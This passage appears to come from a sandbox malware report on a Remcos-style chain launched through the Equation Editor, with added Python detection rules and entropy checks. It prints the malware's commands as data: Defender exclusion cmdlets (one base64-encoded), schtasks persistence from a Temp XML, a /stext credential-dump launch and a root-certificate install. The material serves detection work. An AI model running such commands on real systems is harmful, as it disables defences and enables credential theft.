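cmdlet that way) are assumptions for illustration.

```python
import base64
import re
from collections import Counter

# Constructed event list: process-creation and image-load rows from the report,
# re-typed as dicts, plus one constructed -EncodedCommand variant (last process
# event) so the base64 path is exercised. Not a real log export.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SCR = r"C:\Users\user\AppData\Roaming\plugman23456.scr"
EXE = r"C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"


def encode_powershell_command(script: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def proc(parent, image, cmdline):
    return {"type": "process", "parent": parent, "image": image, "cmdline": cmdline}


def load(image, module):
    return {"type": "imageload", "image": image, "module": module}


SAMPLE_EVENTS = [
    proc(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", EQN, f'"{EQN}" -Embedding'),
    proc(EQN, SCR, f'"{SCR}"'),
    proc(SCR, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{SCR}"'),
    proc(SCR, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{EXE}"'),
    proc(SCR, r"C:\Windows\SysWOW64\schtasks.exe",
         f'"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\znlzneAxBVd" /XML "{TEMP}\\tmpF0B6.tmp"'),
    proc(SCR, SCR, f'"{SCR}"'),  # plain self-launch (injection target): no /stext, no hit
    proc(SCR, SCR, f'{SCR} /stext "{TEMP}\\bhyzucyduxfccvbqstsgmdbbressguvzg"'),
    proc(r"C:\Windows\System32\taskeng.exe", EXE, EXE),
    # constructed variant, not in the report: the same cmdlet hidden behind -EncodedCommand
    proc(EXE, PS, f'"{PS}" -NoProfile -EncodedCommand '
         + encode_powershell_command(f'Add-MpPreference -ExclusionPath "{EXE}"')),
    load(SCR, "mozglue.dll"),
    load(SCR, "pstorec.dll"),
    load(SCR, "version.dll"),
    load(r"C:\Program Files\Mozilla Firefox\firefox.exe", "mozglue.dll"),  # constructed, benign
]

EXCLUSION_RE = re.compile(r"(?:add|set)-mppreference\s+-exclusion(?:path|process|extension)", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
STEXT_RE = re.compile(r'/stext\s+"?[^"]*\\Temp\\', re.I)
CRED_DLLS = {"mozglue.dll", "nss3.dll", "pstorec.dll"}  # nss3.dll added by assumption
BROWSER_IMAGES = {"firefox.exe", "thunderbird.exe"}      # assumed legitimate hosts


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Run every rule over the event list; returns (rule, image, detail) tuples."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
            if parent == "eqnedt32.exe":
                hits.append(("equation_editor_child", image, cmd))
            if image == "powershell.exe":
                decoded = decode_encoded_command(cmd)
                if EXCLUSION_RE.search(cmd + " " + (decoded or "")):
                    hits.append(("defender_exclusion", image, decoded or cmd))
            if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and TEMP_RE.search(cmd):
                hits.append(("schtasks_xml_from_temp", image, cmd))
            if parent == image and STEXT_RE.search(cmd):
                hits.append(("self_spawn_stext_dump", image, cmd))
        elif ev["type"] == "imageload":
            image, module = basename(ev["image"]), basename(ev["module"])
            if module in CRED_DLLS and image not in BROWSER_IMAGES:
                hits.append(("credential_dll_in_foreign_process", image, module))
    return hits


def summarize(hits):
    """Hit count per rule, the shape an alert dashboard would want."""
    return Counter(rule for rule, _, _ in hits)


if __name__ == "__main__":
    for rule, image, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule:36} {image:20} {detail}")
```

                  Fed the report's chain, the rules fire eight times: one Equation Editor child, three Defender exclusions (two plaintext, one decoded from base64), one task from Temp, one /stext dump, and two credential-DLL loads in plugman23456.scr; the benign firefox.exe load and the plain self-launch stay quiet. The parent == image test for /stext is deliberate: Remcos runs the recovery modules from its own injected image, so the child carries the same name as the parent.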

                  Data Obfuscation

                  Source: plug[1].scr.2.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: plugman23456.scr.2.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: znlzneAxBVd.exe.5.dr, PhotoBoothHome.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.cs.Net Code: MNFJrBJ49X System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,21_2_004044A4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032713E push edi; ret 2_2_0032713F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00326626 push esi; ret 2_2_00326627
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032332E push edi; ret 2_2_0032332F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00310003 push 80000000h; iretd 2_2_00310008
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0031C264 pushad ; retn 0031h 2_2_0031C289
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00314943 push 80000000h; iretd 2_2_00314948
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00318F44 push eax; retf 2_2_00318F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003250B0 push edi; ret 2_2_003250B3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003258BA push esi; ret 2_2_003258BB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003265F6 push esi; ret 2_2_003265F7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003101F4 push eax; retf 2_2_003101F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003265FE push esi; ret 2_2_003265FF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003265EE push esi; ret 2_2_003265EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003270D6 push ebp; ret 2_2_003270D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0030FFD9 push 80000000h; retf 0000h 2_2_0030FFE0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0031C2DC pushad ; retn 0031h 2_2_0031C2DD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_003232C6 push ebp; ret 2_2_003232C7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 12_2_10002806 push ecx; ret 12_2_10002819
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0044693D push ecx; ret 21_2_0044694D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0044DB70 push eax; ret 21_2_0044DB84
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_0044DB70 push eax; ret 21_2_0044DBAC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 21_2_00451D54 push eax; ret 21_2_00451D61
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_0044B090 push eax; ret 22_2_0044B0A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_0044B090 push eax; ret 22_2_0044B0CC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_00451D34 push eax; ret 22_2_00451D41
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_00444E71 push ecx; ret 22_2_00444E81
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_00414060 push eax; ret 23_2_00414074
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_00414060 push eax; ret 23_2_0041409C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_00414039 push ecx; ret 23_2_00414049
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_004164EB push 0000006Ah; retf 23_2_004165C4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 23_2_00416553 push 0000006Ah; retf 23_2_004165C4
                  Source: plug[1].scr.2.dr Static PE information: section name: .text entropy: 7.954754683206141
                  Source: plugman23456.scr.2.dr Static PE information: section name: .text entropy: 7.954754683206141
                  Source: znlzneAxBVd.exe.5.dr Static PE information: section name: .text entropy: 7.954754683206141
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, 5.2.plugman23456.scr.38ea170.4.raw.unpack, 5.2.plugman23456.scr.4fa0000.8.raw.unpack (the same 21 classes are flagged in each of the three memory dumps):
                      gVPP59x0g7rK6ZWOvl.cs High entropy of concatenated method names: 'b5jRAhRFS2', 'YvGR4nOMMO', 'NdxRl73dVZ', 'MipRtbHrsB', 'fXmRbjFT6c', 'O6OROrOBfO', 'RU6R7BbkJ0', 'RaoRBTGZt7', 'JJFR2UQ3iq', 'TZtRaii9Sb'
                      b5Z6ZpMTmYhNDSOPgy.cs High entropy of concatenated method names: 'CcgkmqZxk3', 'ppak8ZSyrZ', 'h6kkruOIyE', 'orckSdQMT6', 'ngdkYtxfSL', 'n1Akvm6oEV', 'a4qkiMblni', 'w1hkLu7Fff', 'tNgMFIBHoepsk8Ka4Th', 'nrsIm6BJU5f9veCD0cL'
                      UCLDXKTwALbqw6acgM.cs High entropy of concatenated method names: 'yM7ksBmBTl', 'HndkRkGkKX', 'vTmkZ8trKM', 'gMvkjIaWBs', 'gbsknObfCI', 'DARZb63CaB', 'MfhZOYGnZx', 'L7tZ7hPUrJ', 'JivZByQMkg', 'mMAZ28XhEK'
                      Uh7CyXBrKx7CHZBlRH.cs High entropy of concatenated method names: 'UHmGfNv42k', 'muAGRKIIsE', 'L3CG9aBl27', 'E1PGZVddug', 'TEVGk3pHmQ', 'wIVGjebxir', 'wiLGnVOW23', 'CLBGgGNRZT', 'QQEGpNWXvI', 'I72GoVUoA0'
                      ot7ccRIYfCGBeI1Nt4.cs High entropy of concatenated method names: 'I9kjfTS8Xx', 'lwjj9w04Sm', 'FWRjkIbkRX', 'PTxkaJQD8J', 'Km6kzeqd0l', 'UOojQg6Ve4', 'i7OjW1pxjC', 'b0WjCJqjab', 'L5bj65aWBm', 'mhJjJS3Imo'
                      TfG9VpJWTGHvDMAOW4.cs High entropy of concatenated method names: 'YpRWjVPP59', 'og7WnrK6ZW', 'wkwWpDkSYM', 'JtdWo6aRkg', 'ptWW0vEbCL', 'HXKWUwALbq', 'SyGdN4oX9VAoaRmADl', 'K4q2eu4bVFhxOAbFw4', 'zJvWWjpQ56', 'WD9W61XbPE'
                      C9ZsP4lLVd0D38e7iF.cs High entropy of concatenated method names: 'ToString', 'WDEU1wLqk3', 'HHEUdnCIRm', 'qJDUDKOY6F', 'mDSUM7sM6E', 'Ai8UXBHrbM', 'dIJUEQhHyE', 'McGUIpvb6O', 'gXRUcHSxwT', 'ucbU5P1MYa'
                      WiwhDEOeobox14JLf2.cs High entropy of concatenated method names: 'QW0yBfccu6', 'B4Sya7iGUa', 'iJZGQfT9D8', 'HE3GWR46Ka', 'V05y1IibIJ', 'Khoy3flCdB', 'gGTyKVU5EZ', 'MBjyAVjeQ4', 'N4wy4hJVax', 'OUjylidDyA'
                      fCsRxAWQlGZ1RtPLE5a.cs High entropy of concatenated method names: 'j4SH8ei9ae', 'LSWHq1gOA3', 'vPVHrie5qh', 'cxQHSWHhQm', 'JsQHN1Vjc1', 'Nl2HYLN9ox', 'u5MHvf5PBP', 'fOMHxfnyY8', 'lNZHiZHAXZ', 'zqRHLSnaWy'
                      npLGRyAU4LiV4BYMRm.cs High entropy of concatenated method names: 'EcP0FOtUmJ', 'ACc03KItT3', 'ubN0AN8g5R', 'FMx04Zous4', 'zjR0dHBMrw', 'MhS0DJxAC8', 'qT20MYyqDJ', 'f800XOmME2', 'Oss0EVfh8s', 'vO40Ihavxn'
                      VwD1A4Krg6ay80AAUQ.cs High entropy of concatenated method names: 'qbZVxjSrcO', 'w07ViddbQE', 'JbGVTLemUj', 'gkyVd77AmV', 'NAsVMQxdmn', 'jgHVXtK9rO', 'tncVIhU4PQ', 'IQvVc1Kj8p', 'fVCVF0xIWc', 'Ax0V1yLvNU'
                      YRkgxaL7fs19wUtWvE.cs High entropy of concatenated method names: 'felZN1DGWV', 'bM7Zv1sqCb', 'gAr9DoQKIu', 'UJE9Mv6Kne', 'mKS9XbFkYU', 'LYS9EBAffH', 'uj39IaNKPp', 'Kv09cfOhfr', 'FG5956HejZ', 'IFQ9F7DEmL'
                      lWFL1Zax9sOlYCjl2P.cs High entropy of concatenated method names: 'DdpHWTbDRO', 'KRBH6h2vdJ', 'zXUHJQrVqf', 'mbbHfYYLy9', 'xANHRRDxw6', 'MUoHZ5iLSh', 'WWaHk1lj6k', 'O0RG7UYSnU', 'pTcGBqm2pL', 'ufIG2Xg9S6'
                      MiBZoGzXoBWkGomNiG.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'muYHVTUo6Z', 'p88H0Zhxp3', 'lT7HUyeWvQ', 'zogHyLOKrn', 'TK7HGKkwA5', 'Rh7HHC5oVW', 'IjJHPEkm2i'
                      PnUTpiW6WXJMEpReP0D.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MB6PAaKGyY', 'nvcP4FhPis', 'zRRPlEnNtP', 'Q6dPtSmEwS', 'XdVPbWMdS6', 'iwfPOLOEV0', 'uFLP7IIQXi'
                      l2l1amikwDkSYMXtd6.cs High entropy of concatenated method names: 'lI29S99lQ7', 'BNi9Ys1CuM', 'Hgt9xZcCnu', 'XB39iTbVIt', 'CAY90IF9lq', 'xpi9UFIu4H', 'rAL9ynlF30', 'Qjt9GIswhG', 'f1S9HckxLr', 'CFW9P57PY4'
                      kQAisy255KPRYZ0AXG.cs High entropy of concatenated method names: 'P4IGToaCJd', 'GueGdNPvTn', 'DHsGDrF35t', 'VaDGMP8Lgi', 'AEpGA3o8aE', 'e5EGXFr1uc', 'Next', 'Next', 'Next', 'NextBytes'
                      MXbKB5RaqyYt1WWwDP.cs High entropy of concatenated method names: 'Dispose', 'PTEW2NSV7A', 'TiHCdBEVPr', 'HcDqqfoK8s', 'WbhWa7CyXr', 'Qx7WzCHZBl', 'ProcessDialogKey', 'gHnCQQAisy', 'N5KCWPRYZ0', 'QXGCCgWFL1'
                      QgxhOK5sxigKaKcO6j.cs High entropy of concatenated method names: 'cG2j8eubCD', 'LedjqDoLR1', 'q4tjrFlSQD', 'RyijS8mdUF', 'QHyjN543vd', 'Gx8jY4C19u', 'GD8jvZxWcA', 'i19jxE001t', 'FjIjiMlDPT', 'SQFjLomEgB'
                      tCvJFyCJaxowbDKX1A.cs High entropy of concatenated method names: 'WuyrCR4ii', 'r3VSjpeMF', 'tN8YPqYSd', 'tIgvnJRrK', 'O5Gi1aOSO', 'D84LjCe3k', 'LG6YTMAcligSBlsVSp', 'bkgEXnhhq1ElD9pE2c', 'XdLGjx18M', 'sLmPaacGU'
                      kiGuuLnuA0qaZ9jFQW.cs High entropy of concatenated method names: 'sjP6siki0O', 'UlC6fKZmgk', 'Nj36R1ZHHC', 'n9H69Meg9Z', 'Voj6ZscI9o', 'Kok6kqO1mq', 'AsR6jApGAj', 'S4D6nXSNtD', 'pNM6gjcPtm', 'oof6pxaZNP'
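                  The two obfuscation signals above (a .text section with entropy 7.95 bits per byte, and .NET classes whose concatenated method names have high character entropy) are both plain Shannon-entropy measurements. The following is an added example, not Joe Sandbox's code, that recomputes them: a minimal PE section-table reader that works on any PE read in binary mode, an entropy function, and a run over a constructed two-section PE plus method names copied from the report. The 7.2 bits/byte cut-off, the fake PE builder and the random-seed "packed" .text are assumptions made for the demonstration; the sandbox's own threshold is not published on the page.

```python
"""Recompute two obfuscation signals from the report: the Shannon entropy of
a PE section's raw bytes ('.text entropy: 7.95...') and the character
entropy of concatenated .NET method names. Added example, not Joe Sandbox
code; the 7.2 bits/byte cut-off is an assumption, not the sandbox's."""
import math
import random
import struct
from collections import Counter

SECTION_THRESHOLD = 7.2  # assumed: ordinary x86 code usually sits near 6-6.5 bits/byte


def shannon_entropy(data):
    """Shannon entropy in bits per symbol of a bytes or str value
    (0.0 for empty input and for input made of a single symbol)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(pe):
    """Yield (name, raw_bytes) for each section of a PE image, reading only
    e_lfanew, NumberOfSections, SizeOfOptionalHeader and the 40-byte
    IMAGE_SECTION_HEADER entries. Works on a real file read in binary mode."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        if raw_size == 0:  # .bss-style sections have no bytes on disk
            continue
        yield name.rstrip(b"\0").decode("ascii", "replace"), pe[raw_ptr:raw_ptr + raw_size]


def high_entropy_sections(pe, threshold=SECTION_THRESHOLD):
    """Map section name -> entropy for every section at or above threshold."""
    flagged = {}
    for name, data in pe_sections(pe):
        h = shannon_entropy(data)
        if h >= threshold:
            flagged[name] = round(h, 3)
    return flagged


def name_entropy(method_names):
    """Character entropy of the concatenated method names of one class."""
    return shannon_entropy("".join(method_names))


def build_fake_pe(sections):
    """Build a minimal PE32 image from [(name, raw_bytes), ...]. Constructed
    test input only: enough header for the parser above, not a loadable file."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    table, body, raw_ptr = bytearray(), bytearray(), 0x200
    for idx, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0x1000 * (idx + 1), len(data), raw_ptr,
                             0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return headers.ljust(0x200, b"\0") + bytes(body)


# Constructed sample: a .text that looks encrypted/packed next to an .rdata
# of repeated strings, so the two entropy regimes can be compared.
_rng = random.Random(1465260)  # fixed seed: the example is reproducible
PACKED_TEXT = bytes(_rng.randrange(256) for _ in range(16384))
PLAIN_RDATA = b"Updates\\znlzneAxBVd\0plugman23456.scr\0" * 200
SAMPLE_PE = build_fake_pe([(".text", PACKED_TEXT), (".rdata", PLAIN_RDATA)])

# Method names copied from the report: one renamed class, and the three
# TypeConverter overrides that kept their real names.
OBFUSCATED_NAMES = ['b5jRAhRFS2', 'YvGR4nOMMO', 'NdxRl73dVZ', 'MipRtbHrsB', 'fXmRbjFT6c',
                    'O6OROrOBfO', 'RU6R7BbkJ0', 'RaoRBTGZt7', 'JJFR2UQ3iq', 'TZtRaii9Sb']
READABLE_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo']

if __name__ == "__main__":
    for name, data in pe_sections(SAMPLE_PE):
        print(f"{name:<8} {len(data):6d} bytes  entropy {shannon_entropy(data):.3f}")
    print("flagged:", high_entropy_sections(SAMPLE_PE))
    print(f"renamed methods:  {name_entropy(OBFUSCATED_NAMES):.2f} bits/char")
    print(f"readable methods: {name_entropy(READABLE_NAMES):.2f} bits/char")
```

                  Run against a real sample, pe_sections(open(path, "rb").read()) gives the same per-section figures the report prints; the interesting caveat is that a .text section near 8 bits/byte only says the code is packed or encrypted, not what it unpacks to, which is why the report pairs this signal with the memory-dump findings rather than relying on it alone.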

                  Persistence and Installation Behavior

                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\plugman23456.scr
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_00406EB0 ShellExecuteW,URLDownloadToFileW, 25_2_00406EB0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr File created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 25_2_0041AA4A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Code function: 22_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_004047CB
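                  Two rows in the persistence sections are the ones a detection engineer would turn into rules: the schtasks /Create whose task definition is an XML file under the user's Temp directory (the report's Sigma hit "Scheduled temp file as task from temp location"), and the PowerShell write under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates, which adds a trust anchor for the whole machine. The block below is an added example, not the sandbox's or the Sigma project's code: it encodes both checks and runs them over three constructed event records, two built from the report's own rows and one benign control. The temp-directory and user-writable path lists and the event record layout are assumptions a real deployment would adapt to its EDR schema.

```python
"""Detection logic for two persistence events in the report: schtasks /Create
driven by a task XML in a temp directory, and a certificate written into the
machine ROOT store. Added example, not sandbox or Sigma code; the event
records are constructed from the report's rows and the path lists are
assumptions a deployment would tune."""
import re
from dataclasses import dataclass

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\")
ROOT_STORE = "\\software\\microsoft\\systemcertificates\\root\\certificates\\"


@dataclass
class Event:
    kind: str                 # "process" (creation) or "registry" (value set)
    image: str                # acting process
    command_line: str = ""
    parent_image: str = ""
    target: str = ""          # registry key for "registry" events


def split_args(command_line):
    """Split a Windows command line on whitespace while keeping quoted
    arguments whole (sufficient for schtasks; not a full CommandLineToArgvW)."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', command_line)]


def arg_value(args, switch):
    """Return the argument following a case-insensitive switch (/TN, /XML)."""
    for i in range(len(args) - 1):
        if args[i].lower() == switch.lower():
            return args[i + 1]
    return None


def check_schtasks(ev):
    """Flag /Create runs whose XML comes from a temp path or whose parent
    lives in a user-writable directory; the task name is appended when present."""
    if ev.kind != "process" or not ev.image.lower().endswith("schtasks.exe"):
        return []
    args = split_args(ev.command_line)
    if "/create" not in (a.lower() for a in args):
        return []
    findings = []
    xml = arg_value(args, "/XML")
    if xml and any(d in xml.lower() for d in TEMP_DIRS):
        findings.append(f"schtasks /Create with task XML in temp dir: {xml}")
    if any(d in ev.parent_image.lower() for d in USER_WRITABLE):
        findings.append(f"schtasks spawned from user-writable path: {ev.parent_image}")
    task = arg_value(args, "/TN")
    return [f"{f} (task {task})" if task else f for f in findings]


def check_root_cert(ev):
    """Flag any write under the machine ROOT certificate store: a new trust
    anchor makes attacker-issued certificates trusted system-wide."""
    if ev.kind != "registry" or ROOT_STORE not in ev.target.lower():
        return []
    thumbprint = ev.target.rstrip("\\").rsplit("\\", 1)[-1]
    return [f"ROOT store certificate {thumbprint} written by {ev.image}"]


def triage(events):
    """Run both checks over a batch of events and return all findings."""
    findings = []
    for ev in events:
        findings += check_schtasks(ev) + check_root_cert(ev)
    return findings


# Constructed events: the first two mirror the report's rows, the third is a
# benign control (task XML from ProgramData, parent cmd.exe) that must not fire.
SAMPLE_EVENTS = [
    Event("process",
          image=r"C:\Windows\SysWOW64\schtasks.exe",
          command_line=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"',
          parent_image=r"C:\Users\user\AppData\Roaming\plugman23456.scr"),
    Event("registry",
          image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          target=r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C"),
    Event("process",
          image=r"C:\Windows\System32\schtasks.exe",
          command_line=r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
          parent_image=r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

                  The schtasks check fires twice on the report's row (temp XML and a parent in AppData\Roaming), once on the certificate write, and not at all on the control. Note that the report's command line names C:\Windows\System32\schtasks.exe while the created image is C:\Windows\SysWOW64\schtasks.exe: the 32-bit dropper is redirected by WOW64, so a rule keyed only on the System32 image path would miss this event.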
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (35 identical events)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (3 identical events)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 identical events)
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Process information set: NOOPENFILEERRORBOX (37 identical events)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskeng.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Code function: 25_2_0040F7A7 Sleep,ExitProcess, 25_2_0040F7A7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 1B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 24D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 54B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 64B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 65E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scr Memory allocated: 75E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe Memory allocated: 170000 memory reserve | memory write watch
